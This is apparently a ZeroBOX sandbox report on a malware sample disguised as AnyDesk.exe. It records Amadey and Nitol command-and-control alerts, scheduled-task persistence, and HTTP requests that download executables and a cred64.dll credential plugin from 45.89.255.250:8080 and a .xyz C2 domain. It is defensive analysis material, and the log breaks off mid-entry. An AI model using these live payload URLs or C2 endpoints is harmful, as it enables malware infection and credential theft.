popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

AnyDesk.exe

NPKI Emotet Generic Malware ASPack Antivirus Malicious Packer UPX Malicious Library PWS Socket AntiDebug JPEG Format PE64 DLL OS Processor Check PE32 PE File .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 12, 2022, 11:13 a.m. Dec. 12, 2022, 11:15 a.m.
Size 307.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d332cf184ac8335d2c3581a48ee0ad87
SHA256 d7e5fa6922a95dfb84d870acd40632bde2c667d90f4c6e632342f03bab338fb2
CRC32 62E5FCBF
ssdeep 6144:6zUx+CLxZyLMZ58dt/AlbTX61DESFCYWZOmCRm1cp4SY:6DAZyrdtoJK1DE0dWtCQeA
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49172 -> 45.89.255.254:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.89.255.250:8080 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49178 -> 45.89.255.250:8080 2016700 ET HUNTING Suspicious explorer.exe in URI Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49178 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.89.255.250:8080 -> 192.168.56.103:49191 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49191 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49191 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 45.89.255.254:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.254:80 -> 192.168.56.103:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 45.89.255.250:40404 2025135 ET MALWARE [PTsecurity] Botnet Nitol.B Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.89.255.250:8080 -> 192.168.56.103:49186 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49186 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49186 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49188 -> 45.89.255.250:50505 2014600 ET MALWARE Win32/Nitol.A Checkin Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006039d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00604218
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00604358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00604358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .itext
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/TeamViewerSetupx64.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/explorer.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/TeamViewer_Desktop.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/LanguageTool.exe
suspicious_features GET method with no useragent header suspicious_request GET http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/Plugins/cred64.dll
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php?scr=1
request GET http://45.89.255.250:8080/TeamViewerSetupx64.exe
request GET http://45.89.255.250:8080/explorer.exe
request GET http://45.89.255.250:8080/TeamViewer_Desktop.exe
request GET http://45.89.255.250:8080/LanguageTool.exe
request GET http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/Plugins/cred64.dll
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php?scr=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00380000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e72000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00460000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00415000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00417000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0040a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00407000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00406000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04881000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04882000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04883000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04884000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04885000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04886000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04887000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04888000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
